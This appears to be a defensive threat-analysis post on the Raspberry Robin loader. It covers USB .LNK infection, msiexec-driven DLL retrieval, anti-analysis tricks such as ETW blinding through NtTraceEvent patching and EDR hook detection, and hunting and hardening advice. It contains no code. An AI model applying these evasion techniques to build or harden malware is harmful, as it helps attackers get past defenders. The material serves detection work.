Goldberg's technical analysis of a real, actively-tracked threat. Atomic indicators rotate (C2 on compromised infrastructure) — consult references for current detail.
Overview
Raspberry Robin stands out for two reasons: an old-school USB propagation vector that still works, and an unusually well-engineered loader that has made it a premier initial-access broker — selling footholds that lead to Dridex, and to ransomware.
Infection chain
Classic entry is a user plugging in an infected USB containing a malicious .LNK. The
shortcut kicks off a chain (often abusing msiexec / legitimate utilities) that pulls a
DLL payload — historically from compromised QNAP devices, frequently over port
8080. By 2024–2025 it had broadened to phishing, malvertising, and Discord's CDN.
Anti-analysis (the interesting part)
- Multi-layer packing, control-flow flattening, and opaque predicates to exhaust reverse engineers.
- Hook detection in
LdrLoadDll()to spot AV/EDR userland hooks. - ETW blinding: in-memory patching of
NtTraceEventto disable Event Tracing for Windows. - Anti-VM / anti-sandbox checks that cause a clean exit in analysis environments.
- Payload DLLs masquerade as legitimate libraries (e.g.,
libapriconv-1.dll).
Why it matters
Raspberry Robin is rarely the end goal — it's the front door. A detection here is an early-warning that more capable actors may already have purchased access, so it warrants an urgent, assume-breach response rather than a routine clean.
Detection & hardening
- Hunt for
.LNK-initiatedmsiexec/rundll32chains reaching external hosts on odd ports (e.g., 8080). - Flag ETW/AMSI tampering and DLLs loading under legitimate library names from unusual paths.
- Disable USB autorun and control removable-media execution policy (USB is still the vector).